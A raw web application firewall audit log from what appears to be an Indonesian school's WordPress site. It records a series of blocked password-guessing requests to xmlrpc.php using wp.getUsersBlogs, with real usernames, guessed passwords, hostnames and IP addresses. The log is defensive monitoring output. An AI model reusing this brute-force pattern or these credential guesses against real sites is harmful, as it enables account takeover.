Apache-HttpClient/4.5.2 (Java/1.8.0_161) --29febd53-C-- wp.getUsersBlogs admin 123456zx --29febd53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29febd53-E-- --29febd53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283890244807 5392 (- - -) Stopwatch2: 1749283890244807 5392; combined=3880, p1=480, p2=3209, p3=0, p4=0, p5=112, sr=94, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29febd53-Z-- --be67997b-A-- [07/Jun/2025:15:11:49 +0700] aEP0RRK9gc79coX6mHSACAAAAFQ 103.236.140.4 53824 103.236.140.4 8181 --be67997b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --be67997b-C-- wp.getUsersBlogs admin 1234%^&* --be67997b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be67997b-E-- --be67997b-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283909476311 4607 (- - -) Stopwatch2: 1749283909476311 4607; combined=3521, p1=447, p2=2911, p3=0, p4=0, p5=99, sr=84, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be67997b-Z-- --174d862b-A-- [07/Jun/2025:15:12:31 +0700] aEP0b2COO9DrcKL2J_7vPgAAAMw 103.236.140.4 55120 103.236.140.4 8181 --174d862b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --174d862b-C-- wp.getUsersBlogs admin master --174d862b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --174d862b-E-- --174d862b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283951844361 5528 (- - -) Stopwatch2: 1749283951844361 5528; combined=3988, p1=467, p2=3347, p3=0, p4=0, p5=102, sr=92, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --174d862b-Z-- --cbb2a702-A-- [07/Jun/2025:15:13:31 +0700] aEP0q_ClubEPOra_8Un_ZQAAAAU 103.236.140.4 57068 103.236.140.4 8181 --cbb2a702-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cbb2a702-C-- wp.getUsersBlogs admin elizabeth --cbb2a702-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbb2a702-E-- --cbb2a702-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284011643373 4953 (- - -) Stopwatch2: 1749284011643373 4953; combined=3855, p1=444, p2=3230, p3=0, p4=0, p5=106, sr=84, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbb2a702-Z-- --ad844b0d-A-- [07/Jun/2025:15:14:32 +0700] aEP06GCOO9DrcKL2J_7wMgAAAM4 103.236.140.4 58964 103.236.140.4 8181 --ad844b0d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 216 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ad844b0d-C-- wp.getUsersBlogs wakakur 123 --ad844b0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad844b0d-E-- --ad844b0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (95+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284072655710 5580 (- - -) Stopwatch2: 1749284072655710 5580; combined=3900, p1=471, p2=3229, p3=0, p4=0, p5=114, sr=90, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad844b0d-Z-- --28885127-A-- [07/Jun/2025:15:15:32 +0700] aEP1JJANhDjQAvBdMyHScAAAAJY 103.236.140.4 60662 103.236.140.4 8181 --28885127-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --28885127-C-- wp.getUsersBlogs wakakur 12344321 --28885127-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28885127-E-- --28885127-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (104+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284132273038 5535 (- - -) Stopwatch2: 1749284132273038 5535; combined=4112, p1=519, p2=3382, p3=0, p4=0, p5=122, sr=88, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28885127-Z-- --244e4000-A-- [07/Jun/2025:15:16:32 +0700] aEP1YJANhDjQAvBdMyHTEwAAAIo 103.236.140.4 34098 103.236.140.4 8181 --244e4000-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --244e4000-C-- wp.getUsersBlogs wakakur scooter --244e4000-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --244e4000-E-- --244e4000-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (86+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284192570248 5475 (- - -) Stopwatch2: 1749284192570248 5475; combined=3891, p1=461, p2=3199, p3=0, p4=0, p5=143, sr=89, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --244e4000-Z-- --3c97b139-A-- [07/Jun/2025:15:17:32 +0700] aEP1nBK9gc79coX6mHSDegAAAFE 103.236.140.4 35852 103.236.140.4 8181 --3c97b139-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3c97b139-C-- wp.getUsersBlogs wakakur poohbear --3c97b139-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c97b139-E-- --3c97b139-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (99+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284252546881 5326 (- - -) Stopwatch2: 1749284252546881 5326; combined=4035, p1=518, p2=3269, p3=0, p4=0, p5=146, sr=88, sw=102, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c97b139-Z-- --0f1f5c38-A-- [07/Jun/2025:15:18:32 +0700] aEP12BK9gc79coX6mHSD7wAAAEA 103.236.140.4 37582 103.236.140.4 8181 --0f1f5c38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0f1f5c38-C-- wp.getUsersBlogs wakakur marketing2022 --0f1f5c38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f1f5c38-E-- --0f1f5c38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284312251302 5391 (- - -) Stopwatch2: 1749284312251302 5391; combined=3837, p1=468, p2=3188, p3=0, p4=0, p5=106, sr=90, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f1f5c38-Z-- --f776a35b-A-- [07/Jun/2025:15:19:32 +0700] aEP2FPClubEPOra_8UkB-gAAABE 103.236.140.4 39524 103.236.140.4 8181 --f776a35b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f776a35b-C-- wp.getUsersBlogs wakakur celtic1888 --f776a35b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f776a35b-E-- --f776a35b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284372756753 5163 (- - -) Stopwatch2: 1749284372756753 5163; combined=4130, p1=500, p2=3452, p3=0, p4=0, p5=105, sr=88, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f776a35b-Z-- --9803bc0b-A-- [07/Jun/2025:15:20:32 +0700] aEP2UPClubEPOra_8UkCggAAABU 103.236.140.4 41494 103.236.140.4 8181 --9803bc0b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9803bc0b-C-- wp.getUsersBlogs wakakur superadmin --9803bc0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9803bc0b-E-- --9803bc0b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284432041225 5368 (- - -) Stopwatch2: 1749284432041225 5368; combined=3930, p1=490, p2=3143, p3=0, p4=0, p5=163, sr=85, sw=134, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9803bc0b-Z-- --521adc75-A-- [07/Jun/2025:15:21:32 +0700] aEP2jGCOO9DrcKL2J_7zRgAAAMc 103.236.140.4 43610 103.236.140.4 8181 --521adc75-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --521adc75-C-- wp.getUsersBlogs wakakur 852654 --521adc75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --521adc75-E-- --521adc75-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (109+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284492013171 6098 (- - -) Stopwatch2: 1749284492013171 6098; combined=4212, p1=522, p2=3515, p3=0, p4=0, p5=103, sr=98, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --521adc75-Z-- --b5dab400-A-- [07/Jun/2025:15:22:33 +0700] aEP2yZANhDjQAvBdMyHVfQAAAJQ 103.236.140.4 45862 103.236.140.4 8181 --b5dab400-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b5dab400-C-- wp.getUsersBlogs wakakur a123 --b5dab400-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5dab400-E-- --b5dab400-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (86+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284553430513 4824 (- - -) Stopwatch2: 1749284553430513 4824; combined=3429, p1=420, p2=2844, p3=0, p4=0, p5=96, sr=76, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5dab400-Z-- --d521d84f-A-- [07/Jun/2025:15:23:12 +0700] aEP28BK9gc79coX6mHSGyAAAAEM 103.236.140.4 47278 103.236.140.4 8181 --d521d84f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d521d84f-C-- wp.getUsersBlogs wakakur 1234%^&* --d521d84f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d521d84f-E-- --d521d84f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284592479394 5297 (- - -) Stopwatch2: 1749284592479394 5297; combined=4187, p1=481, p2=3515, p3=0, p4=0, p5=118, sr=87, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d521d84f-Z-- --b97cb701-A-- [07/Jun/2025:15:23:34 +0700] aEP3BpANhDjQAvBdMyHWBgAAAJY 103.236.140.4 48040 103.236.140.4 8181 --b97cb701-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b97cb701-C-- wp.getUsersBlogs wakakur administrator1234 --b97cb701-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b97cb701-E-- --b97cb701-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (88+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284614341807 5972 (- - -) Stopwatch2: 1749284614341807 5972; combined=4106, p1=530, p2=3399, p3=0, p4=0, p5=105, sr=91, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b97cb701-Z-- --5acec148-A-- [07/Jun/2025:15:24:35 +0700] aEP3Q_ClubEPOra_8UkFWgAAAAA 103.236.140.4 50190 103.236.140.4 8181 --5acec148-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5acec148-C-- wp.getUsersBlogs wakakur 555555 --5acec148-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5acec148-E-- --5acec148-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284675272741 5038 (- - -) Stopwatch2: 1749284675272741 5038; combined=3894, p1=513, p2=3203, p3=0, p4=0, p5=104, sr=84, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: 